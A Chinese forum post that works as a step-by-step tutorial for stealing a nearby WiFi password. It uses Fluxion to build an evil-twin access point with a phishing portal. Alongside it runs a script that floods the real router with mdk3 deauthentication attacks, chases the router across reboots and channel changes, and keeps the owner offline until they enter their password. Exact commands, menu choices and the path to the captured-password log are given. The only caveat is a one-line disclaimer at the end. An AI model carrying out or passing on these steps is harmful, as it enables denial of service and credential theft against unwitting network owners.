本帖最后由 qsdelol12 于 2022-9-3 14:34 编辑
虚拟机开机密码 : 1 硬件装备:电脑一台,内存8G,硬盘空闲60G,网卡:两张2.4G频段网卡如3070,一张5G频段网卡,淘宝去买搜索【kali网卡5G】
相关软件包下载: ************************************************************************************************** **************************************************************************************************
由于阿里云盘分享限制,压缩包格式已经过伪装,下载后需用win10及以上系统运行以下解析程序解析出真正的格式【下载开始时和下载完成后别随便改文件名称,否则解析失败】 解析后,解压直接用VMware打开该虚拟机即可,啥环境都已经安装好了,开箱即用
2.【破解步骤1 创建钓鱼热点,此步骤网上教程一大把,以下为参考】连接网卡【钓鱼用3070网卡钓2.4G网络】 1. 进入虚拟机桌面鼠标左键双击【wifi-hack】文件夹,找到并打开【fluxion5.9】文件夹 2. 右键单击在这里打开终端 3. 输入 : [sudo su] 回车提取root权限 sudo su 4. 执行命令 [./fluxion.sh] 回车 ./fluxion.sh 5.这里选择 [2] *********************************************************** 请选择一个攻击方式 ESSID: "[N/A]" / [N/A] Channel: [N/A] BSSID: [N/A] ([N/A]) [1] 专属门户 创建一个“邪恶的双胞胎”接入点。 [2] Handshake Snooper 检索WPA/WPA2加密散列。 [3] 返回
*********************************************************** 6. 这里选择 [1] *********************************************************** 选择要扫描的信道 [1] 扫描所有信道 (2.4GHz) [2] 扫描所有信道 (5GHz) [3] 扫描所有信道 (2.4GHz & 5Ghz) [4] 扫描指定信道 [5] 返回 ********************************************************** 7. 看见弹出扫描WiFi信息差不多了就关掉它 8. 选择一个你要破解的WiFi的序号,回车【绿色代表有人上网,可轻松抓包】 9. 这里选择 [2] 跳过 ********************************************************** 为目标跟踪选择无线接口. 可能需要选择专用接口. 如果您不确定,请选择"跳过"! [1] wlan0 Ralink Technology, Corp. RT5370 [2] 跳过 [3] 重试 [4] 返回 ********************************************************** 10. 这里选择 [2] ********************************************************** 此攻击已经配置完毕 [1] 恢复攻击 [2] 重置攻击 ********************************************************* 11. 这里选择 [3] ********************************************************* 选择一种方式来检查握手包获取状态 [1] 监听模式 (被动) [2] aireplay-ng 解除认证方式 (侵略性) [3] mdk3 解除认证方式 (侵略性) [4] 返回 ******************************************************** 12. 这里选择 [3] ******************************************************** 选择Hash的验证方法 [1] pyrit 验证 [2] aircrack-ng 验证 (不推荐) [3] cowpatty 验证 (推荐用这个) [4] 返回 ******************************************************** 13. 这里选择 [1] ******************************************************** 每隔多久检查一次握手包 [1] 每30秒钟 (推荐). [2] 每60秒钟 [3] 每90秒钟 [4] 返回 ******************************************************* 14. 这里选择 [2] ******************************************************* 如何进行验证? [1] Asynchronously (fast systems only). [2] Synchronously (推荐). [3] 返回 ******************************************************* 15. 等抓到包了,吧左下角的那个窗口手动关掉 16. 这里选择 [1] ******************************************************* Handshake Snooper 正在进行攻击...... [1] 选择启动攻击方式 [2] 退出 ******************************************************* 17. 这里选择 [1] ******************************************************* 请选择一个攻击方式 ESSID: "CU_NEFe" / WPA2 Channel: 5 BSSID: 34:78:39 8:86:90 ([N/A]) [1] 专属门户 创建一个“邪恶的双胞胎”接入点。 [2] Handshake Snooper 检索WPA/WPA2加密散列。 [3] 返回 ******************************************************* 18. 这里输入 [y] 回车 ******************************************************* Fluxion正在瞄准上面的接入点. 继续这个目标? [Y/n] ******************************************************* 19. 这里选择 [2] ******************************************************* 为目标跟踪选择无线接口. 可能需要选择专用接口. 如果您不确定,请选择"跳过"! [1] wlan0 Ralink Technology, Corp. RT5370 [2] 跳过 [3] 重试 [4] 返回 ****************************************************** 20. 这里选择 [2] ****************************************************** 此攻击已经配置完毕 [1] 恢复攻击 [2] 重置攻击 ****************************************************** 21. 这里选择 [2] ****************************************************** 为接入点选择一个接口 [1] eth0 [-] Advanced Micro Devices, Inc. [AMD] 79c970 [PCnet32 LANCE] (rev 10) [2] wlan0 Ralink Technology, Corp. RT5370 [3] 重试 [4] 返回 ****************************************************** 22. 这里选择 [1] ******************************************************** 选择一个接入点 ESSID: "CU_NEFe" / WPA2 Channel: 5 BSSID: 34:78:39 8:86:90 ([N/A]) [1] 流氓 AP - hostapd (推荐) [2] 流氓 AP - airbase-ng (缓慢) [3] 返回 ******************************************************** 23. 这里选择 [1] ******************************************************** 发现目标热点的Hash文件. 你想要使用这个文件吗? [1] 使用抓取到的hash文件 [2] 指定hash路径 [3] 握手包目录(重新扫描) [4] 返回 ******************************************************* 24. 这里选择 [3] ******************************************************* 选择Hash的验证方法 ESSID: "CU_NEFe" / WPA2 Channel: 5 BSSID: 34:78:39 8:86:90 ([N/A]) [1] pyrit 验证 [2] aircrack-ng 验证 (不推荐) [3] cowpatty 验证 (推荐用这个) [4] 返回 ********************************************************* 25. 这里选择 [1] ********************************************************* 选择钓鱼认证门户的SSL证书来源 [1] 创建SSL证书 [2] 检测SSL证书 (再次搜索) [3] 没有证书 (disable SSL) [4] 返回 ********************************************************* 26. 这里选择 [1] ********************************************************* 为流氓网络选择Internet连接类型 [1] 断开原网络 (推荐) [2] 仿真 [3] 返回 ********************************************************* 27. 这里输入 [3] 回车 ********************************************************* 选择钓鱼热点的认证网页界面 ESSID: "CU_NEFe" / WPA2 Channel: 5 BSSID: 34:78:39 8:86:90 ([N/A]) [01] 通用认证网页 Arabic [02] 通用认证网页 Bulgarian [03] 通用认证网页 Chinese ********************************************************** 28. 等一小哈钓鱼WiFi就创建好了... [一共有 6 个小的弹窗 ] [如果这些弹窗消失了,表示钓鱼成功,密码会在屏幕上提示给你..] 29. 钓鱼成功页面 【密码位置:/home/kali/桌面/wifi-hack/fluxion-full-ver-qq-qun/fluxion-5.9/attacks/Captive\ Portal/netlog/xxx-xxx-xxx.log】
3.【破解步骤2 运行自动化脚本攻击目标WiFi “双频路由器需要2台机器一起攻击,一台攻击2.4G,另一台攻击5G让目标主人完全无法使用WiFi”】 ********************************************************************************** * * * 本教程重头戏 * * 直接决定成功率 * * * ********************************************************************************** 连接网卡【攻击网卡:3070网卡攻击2.4G网络。5G网卡攻击5G网络】 1. 打开其它的虚拟机
2. 鼠标左键单击桌面的 [wifi-hack] 文件夹 ,,, 然后 鼠标右键单击在这里打开终端 3. 输入 [sudo su] 提取root权限 sudo su 4. 查看网卡【无线网卡一般叫wlan0..wlan1...等等】 ip a 5. 把无线网卡设置为监听模式 airmon-ng check kill airmon-ng start wlan0 【备用命令】 airmon-ng check kill ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
6. 再次查看网卡信息 [wlan0mon 就是监听模式下网卡的名字,记住它] ip a ******************************************************** 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:4d:4c:33 brd ff:ff:ff:ff:ff:ff inet 192.168.255.128/24 brd 192.168.255.255 scope global dynamic noprefixroute eth0 valid_lft 953sec preferred_lft 953sec inet6 fe80::20c:29ff:fe4d:4c33/64 scope link noprefixroute valid_lft forever preferred_lft forever 6: wlan0mon: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000 link/ieee802.11/radiotap c8:3a:35:d0:c5:66 brd ff:ff:ff:ff:ff:ff ********************************************************
7. 查看攻击脚本 ll ********************************************************* 总用量 12 -rw-r--r-- 1 kali kali 10868 8月 27 16:58 hack_wifi_by_mdk_new.sh ******************************************************** 8. 扫描一下WiFi信号,, 差不多了就键盘按下 [Ctrl + c] 组合键 结束扫描 [2.4G] 这是扫描2.4G信号的命令 airodump-ng wlan0mon --band bg [5G] 这是扫描5G的 airodump-ng wlan0mon --band a ******************************************************* CH 14 ][ Elapsed: 12 s ][ 2022-08-27 18:11 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 5C E:34:AE:D3:CD -72 1 1 0 6 540 WPA2 CCMP PSK CMCC-fkVY 34:78:39:D8:86:90 -49 7 0 0 5 130 WPA2 CCMP PSK CU_NEFe 34:CE:00:2C:B9:A0 -59 8 33 0 10 130 WPA2 CCMP PSK 🍇 ****************************************************** 找到你【破解步骤1】钓鱼的那个WiFi的MAC地址并复制下来 9. 运行脚本开启自动化攻击 [注意网卡的名字,和上一步扫描出来的WiFi的MAC地址 ,,别写错了] bash hack_wifi_by_mdk_new.sh wlan0mon 02:3A:7C:6A:83:DB 10. 这里输入的是探测对方路由器是否重启的间隔时间 [推荐 300 秒,,就是每5分钟探测一次对方路由器是否重启过,也可以自定义你喜欢的时间,但是建议必须大于60秒效果才好] ****************************************************** How long do you want zhe hack WIFI inervel time [sec]: ****************************************************** 11. 这里看你攻击的WiFi是2.4G还是5G,对应选择就行了【注意:5G需要支持5G的网卡,如8812au】 ****************************************************** Select one type what you want to hack ************************************ 1. 2.4G * 2. 5G * ************************************ Please select: 1 ****************************************************** 12. 到这里自动攻击就开始了,对方直接不能用WiFi了【重启路由器**也没用**】 ...... 13. 观察左上角的红色弹窗,如果在跑就表示一直在攻击。。。
4.【破解步骤3 定期观察钓鱼状态】 隔一段时间观察一下钓鱼的那台虚拟机,如果6个小的弹窗消失了,说明钓鱼成功,根据提示去看密码就行 .......记得回来把攻击脚本停止掉 小提示:看手机WiFi列表,如果钓鱼WiFi信号消失了也证明钓鱼成功,赶快去钓鱼那台虚拟机查看密码吧,记得关掉攻击脚本哦!!不然主人可能就要上门拜访您了
注意:这款破解手段比较残忍、粗暴、耗时。几小时,几分钟,几天不等。。。 如果主人受不了攻击,破防了那会非常快得到密码
如何让主人快速破防?开启脚本无差别自动化攻击即可,即使主人重启路由器信道发生改变,该脚本也会捕获新的信道并重新攻击,迫使加快他上钩给出密码,这是这款脚本的可怕之处,定期嗅探目标路由器的信道变化并加以攻击,如果对方把路由器关机,那么这款脚本就会每10分钟嗅探一次,一旦嗅探到路由器开机就会立即开启攻击 !!!!!!
假如不使用脚本,主人重启路由器,信道变化了,那么你得手动调整信道进行洪水攻击,而且你不知道主人啥时候重启了路由器对不对,只能定期手动扫描WiFi看看信道变成了什么,再手动调整攻击命令使攻击生效,有了脚本就不需要你操心了,它会帮你解决自动化攻击,重启路由器也逃不过!!!!全过程都是自动化的~~~~
总结:巧用自动化攻击脚本,B站up主:【奥力元给力奥】 让你不管到哪都能连接WiFi,欢迎━(*`∀′*)ノ亻! 一键三连 !!!!!
温馨提醒:切勿将脚本用于恶意攻击等非法用途,否则一切后果自负!!! ​
|